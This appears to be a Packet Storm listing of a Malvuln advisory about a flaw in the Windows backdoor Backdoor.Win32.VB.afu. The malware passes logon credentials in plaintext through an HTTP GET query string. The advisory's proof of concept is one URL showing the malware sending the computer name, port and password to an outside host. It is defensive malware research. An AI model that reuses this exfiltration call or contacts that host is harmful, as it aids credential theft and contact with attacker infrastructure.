what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.VB.afu MVID-2021-0392 Insecure Transit

Backdoor.Win32.VB.afu MVID-2021-0392 Insecure Transit
Posted Nov 8, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.VB.afu suffers from an insecure transit vulnerability that discloses credentials.

tags | exploit
systems | windows
SHA-256 | 413f85b48c4f2085ff0ab4bcb3b2b47858159b2ae57bb6eb74ceafa500e35078

Backdoor.Win32.VB.afu MVID-2021-0392 Insecure Transit

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/c6ba7fcb9eb9bdd7e081e2e84e784dcb_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.VB.afu
Vulnerability: Insecure Transit Password Disclosure
Description: The malware launches Internet Explorer browser and passes logon credentials in plaintext via a URL query string using the HTTP GET request method. Third party attackers who can sniff traffic or access the machine used to logon may also locate the credentials, as the URL contents can potentially be leaked or stored in some of the following locations.

Browser History
Browser Cache
Browser Developer Tools
Cached by web proxy
Referer Header
Web Logs
Shared Systems
Type: PE32
MD5: c6ba7fcb9eb9bdd7e081e2e84e784dcb
Vuln ID: MVID-2021-0392
Dropped files: Explorer.exe
Disclosure: 11/05/2021


Exploit/PoC:
http://splintersecurity.com/omerta/Mail/Mail.php?cn=DESKTOP-2B3JQKO&sn=Server&pt=8079&pw=asdfgh&to=boss_necro@yahoo.com


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close